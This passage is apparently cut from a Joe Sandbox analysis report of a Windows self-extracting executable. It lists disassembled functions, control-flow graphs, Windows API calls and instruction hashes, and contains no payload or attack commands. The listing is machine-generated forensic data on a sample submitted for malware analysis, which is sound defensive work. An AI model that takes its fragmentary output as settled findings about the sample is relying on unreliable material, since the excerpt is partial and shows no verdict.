927 f5a1f5 911->927 912->914 926 f5a1da-f5a1e0 912->926 913->914 928 f5a221-f5a228 913->928 914->889 924->889 929 f5a1fb-f5a1fe 926->929 927->929 930 f5a264-f5a26a 928->930 931 f5a22a-f5a22b 928->931 929->909 932 f5a22c-f5a23c WideCharToMultiByte 930->932 931->932 932->914 933 f5a26c-f5a273 call f5a2c0 932->933 933->895
                  APIs
                  • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00F54E35,00F54E35,?,?,?,00F5A2A9,00000001,00000001,3FE85006), ref: 00F5A0B2
                  • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00F5A2A9,00000001,00000001,3FE85006,?,?,?), ref: 00F5A138
                  • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,3FE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00F5A232
                  • __freea.LIBCMT ref: 00F5A23F
                    • Part of subcall function 00F58518: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00F5C13D,00000000,?,00F567E2,?,00000008,?,00F589AD,?,?,?), ref: 00F5854A
                  • __freea.LIBCMT ref: 00F5A248
                  • __freea.LIBCMT ref: 00F5A26D
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: ByteCharMultiWide__freea$AllocateHeap
                  • String ID:
                  • API String ID: 1414292761-0
                  • Opcode ID: d03df3bf7c2226f742f7f9fe8f8aa92c8c66de51ff5d9b88d48c38b311efdab2
                  • Instruction ID: f01899bd505c7a531b46d081a8c565dcaa651a4901a97ef45945f179eafe3bfc
                  • Opcode Fuzzy Hash: d03df3bf7c2226f742f7f9fe8f8aa92c8c66de51ff5d9b88d48c38b311efdab2
                  • Instruction Fuzzy Hash: 4651F572A10606AFDB258E60CC42FBB77A9EF44761F140329FE04D6140EB75DC68E6A2
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00F4A2C7 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 36COMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 936 f4a2c7-f4a2e6 GetClassNameW 937 f4a30e-f4a310 936->937 938 f4a2e8-f4a2fd call f417ac 936->938 939 f4a312-f4a314 937->939 940 f4a31b-f4a31f 937->940 943 f4a30d 938->943 944 f4a2ff-f4a30b FindWindowExW 938->944 939->940 943->937 944->943
                  APIs
                  • GetClassNameW.USER32(?,?,00000050), ref: 00F4A2DE
                  • SHAutoComplete.SHLWAPI(?,00000010), ref: 00F4A315
                    • Part of subcall function 00F417AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,00F3BB05,00000000,.exe,?,?,00000800,?,?,00F485DF,?), ref: 00F417C2
                  • FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 00F4A305
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: AutoClassCompareCompleteFindNameStringWindow
                  • String ID: @Ut$EDIT
                  • API String ID: 4243998846-2065656831
                  • Opcode ID: aa802e9dd04155578eda0a4953bd98662cb5b0ab21c9a83ae1111c079424b2b0
                  • Instruction ID: b6a75c93b211a57a14819ed6f5ca812e880b4ced9e618de7e5627993593fd0b3
                  • Opcode Fuzzy Hash: aa802e9dd04155578eda0a4953bd98662cb5b0ab21c9a83ae1111c079424b2b0
                  • Instruction Fuzzy Hash: 58F02732E4122C77E7305B249C05FEB7B6C9F46B10F040052BE04E2190E761AD51E6F6
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00F4A335 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 35comCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  APIs
                    • Part of subcall function 00F40085: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00F400A0
                    • Part of subcall function 00F40085: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00F3EB86,Crypt32.dll,00000000,00F3EC0A,?,?,00F3EBEC,?,?,?), ref: 00F400C2
                  • OleInitialize.OLE32(00000000), ref: 00F4A34E
                  • GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00F4A385
                  • SHGetMalloc.SHELL32(00F78430), ref: 00F4A38F
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: DirectoryGdiplusInitializeLibraryLoadMallocStartupSystem
                  • String ID: riched20.dll$3So
                  • API String ID: 3498096277-3464455743
                  • Opcode ID: b31ae7e8fa755d216053981fd985fa9094cac943de0211c5cba8c81ec2c02235
                  • Instruction ID: bd868016a695cb97b04c6901b4259f447834a82900da897d827470e0cc827e03
                  • Opcode Fuzzy Hash: b31ae7e8fa755d216053981fd985fa9094cac943de0211c5cba8c81ec2c02235
                  • Instruction Fuzzy Hash: 22F0F9B1D0020EABCB50AFA9D8499EFFFFCEF95701F00415BE914E2211DBB856459BA1
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00F399B0 Relevance: 7.6, APIs: 5, Instructions: 117filetimeCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 949 f399b0-f399d1 call f4e360 952 f399d3-f399d6 949->952 953 f399dc 949->953 952->953 955 f399d8-f399da 952->955 954 f399de-f399fb 953->954 956 f39a03-f39a0d 954->956 957 f399fd 954->957 955->954 958 f39a12-f39a31 call f370bf 956->958 959 f39a0f 956->959 957->956 962 f39a33 958->962 963 f39a39-f39a57 CreateFileW 958->963 959->958 962->963 964 f39abb-f39ac0 963->964 965 f39a59-f39a7b GetLastError call f3b66c 963->965 966 f39ac2-f39ac5 964->966 967 f39ae1-f39af5 964->967 974 f39aaa-f39aaf 965->974 975 f39a7d-f39a9f CreateFileW GetLastError 965->975 966->967 969 f39ac7-f39adb SetFileTime 966->969 970 f39b13-f39b1e 967->970 971 f39af7-f39b0f call f3fe56 967->971 969->967 971->970 974->964 976 f39ab1 974->976 978 f39aa1 975->978 979 f39aa5-f39aa8 975->979 976->964 978->979 979->964 979->974
                  APIs
                  • CreateFileW.KERNELBASE(?,?,?,00000000,00000003,?,00000000,?,00000000,?,?,00F378AD,?,00000005,?,00000011), ref: 00F39A4C
                  • GetLastError.KERNEL32(?,?,00F378AD,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00F39A59
                  • CreateFileW.KERNEL32(?,?,?,00000000,00000003,?,00000000,?,?,00000800,?,?,00F378AD,?,00000005,?), ref: 00F39A8E
                  • GetLastError.KERNEL32(?,?,00F378AD,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00F39A96
                  • SetFileTime.KERNEL32(00000000,00000000,000000FF,00000000,?,00F378AD,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00F39ADB
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: File$CreateErrorLast$Time
                  • String ID:
                  • API String ID: 1999340476-0
                  • Opcode ID: 4b7cf63e2a309b44359335a4dee61381dba419b1ae9860254c75ce53f28599fc
                  • Instruction ID: 065cd3ea7340426f4e4ed5dc86df46dc33458db0e5b51312b6f485ebb0d3c2b7
                  • Opcode Fuzzy Hash: 4b7cf63e2a309b44359335a4dee61381dba419b1ae9860254c75ce53f28599fc
                  • Instruction Fuzzy Hash: 694135719487466FE7209B20CC05BDABBD4BB01334F100719F9E4961D1E7F9A988EBA1
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00F4AC74 Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 1008 f4ac74-f4ac8d PeekMessageW 1009 f4ac8f-f4aca3 GetMessageW 1008->1009 1010 f4acc8-f4accc 1008->1010 1011 f4acb4-f4acc2 TranslateMessage DispatchMessageW 1009->1011 1012 f4aca5-f4acb2 IsDialogMessageW 1009->1012 1011->1010 1012->1010 1012->1011
                  APIs
                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00F4AC85
                  • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00F4AC96
                  • IsDialogMessageW.USER32(00010428,?), ref: 00F4ACAA
                  • TranslateMessage.USER32(?), ref: 00F4ACB8
                  • DispatchMessageW.USER32(?), ref: 00F4ACC2
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: Message$DialogDispatchPeekTranslate
                  • String ID:
                  • API String ID: 1266772231-0
                  • Opcode ID: 5d9a7c664f189f3207521ab9c0195cbfb436ea41fc066e0441520c9d6ed1500c
                  • Instruction ID: 637ae704739e035a266eb5d37cb29c0aac390af0563ee98cb2b1650f30caa385
                  • Opcode Fuzzy Hash: 5d9a7c664f189f3207521ab9c0195cbfb436ea41fc066e0441520c9d6ed1500c
                  • Instruction Fuzzy Hash: 92F01D71D0222DBB8B609BE1AC4CDEB7F6CEE052A17404416F909D2110EA24D405D7B1
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00F4D287 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 32COMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 1013 f4d287-f4d2b2 call f4e360 SetEnvironmentVariableW call f3fbd8 1017 f4d2b7-f4d2bb 1013->1017 1018 f4d2bd-f4d2c1 1017->1018 1019 f4d2df-f4d2e3 1017->1019 1020 f4d2ca-f4d2d1 call f3fcf1 1018->1020 1023 f4d2c3-f4d2c9 1020->1023 1024 f4d2d3-f4d2d9 SetEnvironmentVariableW 1020->1024 1023->1020 1024->1019
                  APIs
                  • SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 00F4D29D
                  • SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 00F4D2D9
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: EnvironmentVariable
                  • String ID: sfxcmd$sfxpar
                  • API String ID: 1431749950-3493335439
                  • Opcode ID: 32d3fb7d8907cbf02654820012bed6844835ae58eed39a00f060dce338eceec6
                  • Instruction ID: e63792a0b7e8dc0a20394800c4337659f115d553f8d552d3eb5a03e4a21596ea
                  • Opcode Fuzzy Hash: 32d3fb7d8907cbf02654820012bed6844835ae58eed39a00f060dce338eceec6
                  • Instruction Fuzzy Hash: 4FF0A7B2C0022CB6DB202F909C09ABA7F59AF09BA1F000011FC4466151D6A4CE40F7F1
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00F3984E Relevance: 6.1, APIs: 4, Instructions: 57fileCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 1025 f3984e-f3985a 1026 f39867-f3987e ReadFile 1025->1026 1027 f3985c-f39864 GetStdHandle 1025->1027 1028 f39880-f39889 call f39989 1026->1028 1029 f398da 1026->1029 1027->1026 1033 f398a2-f398a6 1028->1033 1034 f3988b-f39893 1028->1034 1031 f398dd-f398e2 1029->1031 1036 f398b7-f398bb 1033->1036 1037 f398a8-f398b1 GetLastError 1033->1037 1034->1033 1035 f39895 1034->1035 1038 f39896-f398a0 call f3984e 1035->1038 1040 f398d5-f398d8 1036->1040 1041 f398bd-f398c5 1036->1041 1037->1036 1039 f398b3-f398b5 1037->1039 1038->1031 1039->1031 1040->1031 1041->1040 1043 f398c7-f398d0 GetLastError 1041->1043 1043->1040 1045 f398d2-f398d3 1043->1045 1045->1038
                  APIs
                  • GetStdHandle.KERNEL32(000000F6), ref: 00F3985E
                  • ReadFile.KERNELBASE(?,?,00000001,?,00000000), ref: 00F39876
                  • GetLastError.KERNEL32 ref: 00F398A8
                  • GetLastError.KERNEL32 ref: 00F398C7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: ErrorLast$FileHandleRead
                  • String ID:
                  • API String ID: 2244327787-0
                  • Opcode ID: 19e2eeccfbd8a9a950fed5436643e5eba106db32e155e5c9bbd22f9199a27b67
                  • Instruction ID: 9eaab9273fa47698d0a29a1af9250520750df60aa7b6f660f0ee5033ffe50070
                  • Opcode Fuzzy Hash: 19e2eeccfbd8a9a950fed5436643e5eba106db32e155e5c9bbd22f9199a27b67
                  • Instruction Fuzzy Hash: 2111CE31D0C208FBDB205F55C804A7937A8FB82735F90812AF82A85680D7F59E48BF61
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00F5A4F4 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                  Download Yara Rule
                  APIs
                  • LoadLibraryExW.KERNELBASE(00000000,00000000,00000800,00F3CFE0,00000000,00000000,?,00F5A49B,00F3CFE0,00000000,00000000,00000000,?,00F5A698,00000006,FlsSetValue), ref: 00F5A526
                  • GetLastError.KERNEL32(?,00F5A49B,00F3CFE0,00000000,00000000,00000000,?,00F5A698,00000006,FlsSetValue,00F67348,00F67350,00000000,00000364,?,00F59077), ref: 00F5A532
                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00F5A49B,00F3CFE0,00000000,00000000,00000000,?,00F5A698,00000006,FlsSetValue,00F67348,00F67350,00000000), ref: 00F5A540
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: LibraryLoad$ErrorLast
                  • String ID:
                  • API String ID: 3177248105-0
                  • Opcode ID: 1d1f60130042aa8dbd85c91cb4d79ca52aeb7a71beca530e38b064b9905cf62e
                  • Instruction ID: e05c7e96d37206a95e2a17284b162eb25864261b9d870d69ddecfb4049e56b25
                  • Opcode Fuzzy Hash: 1d1f60130042aa8dbd85c91cb4d79ca52aeb7a71beca530e38b064b9905cf62e
                  • Instruction Fuzzy Hash: B4012036F11226ABC7218B689C44F577B58AF457B2F190720FF16D3140E731D914EAD1
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00F39F2F Relevance: 4.6, APIs: 3, Instructions: 107fileCOMMON
                  Download Yara Rule
                  APIs
                  • GetStdHandle.KERNEL32(000000F5,?,00000001,?,?,00F3CC94,00000001,?,?,?,00000000,00F44ECD,?,?,?), ref: 00F39F4C
                  • WriteFile.KERNEL32(?,?,?,00000000,00000000,?,?,00000000,00F44ECD,?,?,?,?,?,00F44972,?), ref: 00F39F8E
                  • WriteFile.KERNELBASE(?,?,?,00000000,00000000,?,?,?,00000001,?,?,00F3CC94,00000001,?,?), ref: 00F39FB8
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: FileWrite$Handle
                  • String ID:
                  • API String ID: 4209713984-0
                  • Opcode ID: a173377fc2cf505bef06c625fbeffab348104c030b11e9491f0fe2028add2ddf
                  • Instruction ID: 837f39f51c348c61c112d7ba20dca8548ea1a95e2f1c674625c0da61615ee765
                  • Opcode Fuzzy Hash: a173377fc2cf505bef06c625fbeffab348104c030b11e9491f0fe2028add2ddf
                  • Instruction Fuzzy Hash: 7B31E27160C3059BDF148F24D848B6ABBA8EF50730F044559F895DA281C7F4DD48EBA2
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00F3A207 Relevance: 4.6, APIs: 3, Instructions: 56COMMON
                  Download Yara Rule
                  APIs
                  • CreateDirectoryW.KERNELBASE(?,00000000,?,?,?,00F3A113,?,00000001,00000000,?,?), ref: 00F3A22E
                  • CreateDirectoryW.KERNEL32(?,00000000,?,?,00000800,?,?,?,?,00F3A113,?,00000001,00000000,?,?), ref: 00F3A261
                  • GetLastError.KERNEL32(?,?,?,?,00F3A113,?,00000001,00000000,?,?), ref: 00F3A27E
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: CreateDirectory$ErrorLast
                  • String ID:
                  • API String ID: 2485089472-0
                  • Opcode ID: b941f5c7f8641d5dbd6ecafb6df0c74af8dc9e208bed1514d9a6bc8c01eabff4
                  • Instruction ID: c64ef6775a7f0c4b66ee4da5b7998f8cc71fa84cb8be7ecf01338dae21892f1e
                  • Opcode Fuzzy Hash: b941f5c7f8641d5dbd6ecafb6df0c74af8dc9e208bed1514d9a6bc8c01eabff4
                  • Instruction Fuzzy Hash: 2601B531940618A6DB32ABB64C05BEF734CAF077B1F044455F981D5092D7AACA41F6B3
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00F5AFF4 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 132COMMON
                  Download Yara Rule
                  APIs
                  • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 00F5B019
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: Info
                  • String ID:
                  • API String ID: 1807457897-3916222277
                  • Opcode ID: 67f304988737ad83ad8f6f5e52e94b8e6d7263ffd8b80202ae09fd0b24131b37
                  • Instruction ID: 109cc2d9413757e8d3fc350d51b0914006de00d50d2cdf83fb27a22333378879
                  • Opcode Fuzzy Hash: 67f304988737ad83ad8f6f5e52e94b8e6d7263ffd8b80202ae09fd0b24131b37
                  • Instruction Fuzzy Hash: 6E41277190474C9EDF218E24CC95BF7BBA9EB45305F1404ECEA9A87182D3359A49EF60
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00F5A72C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMONLIBRARYCODE
                  Download Yara Rule
                  APIs
                  • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,3FE85006,00000001,?,?), ref: 00F5A79D
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: String
                  • String ID: LCMapStringEx
                  • API String ID: 2568140703-3893581201
                  • Opcode ID: 35791a99b39f5d59e1703bc7c4467dc918509db8df2b858a5635c34d3a2e4235
                  • Instruction ID: b24a8524afaa4837ebea28c70d59d59e8d245b79649ce6c398b8689cb9bfa29b
                  • Opcode Fuzzy Hash: 35791a99b39f5d59e1703bc7c4467dc918509db8df2b858a5635c34d3a2e4235
                  • Instruction Fuzzy Hash: 2601D33254420DBBCF02AFA0DC06DAE3F66EF0C764F054254FE1465160DA768931FB92
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00F5A6CA Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 34COMMON
                  Download Yara Rule
                  APIs
                  • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,00F59D2F), ref: 00F5A715
                  Strings
                  • InitializeCriticalSectionEx, xrefs: 00F5A6E5
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: CountCriticalInitializeSectionSpin
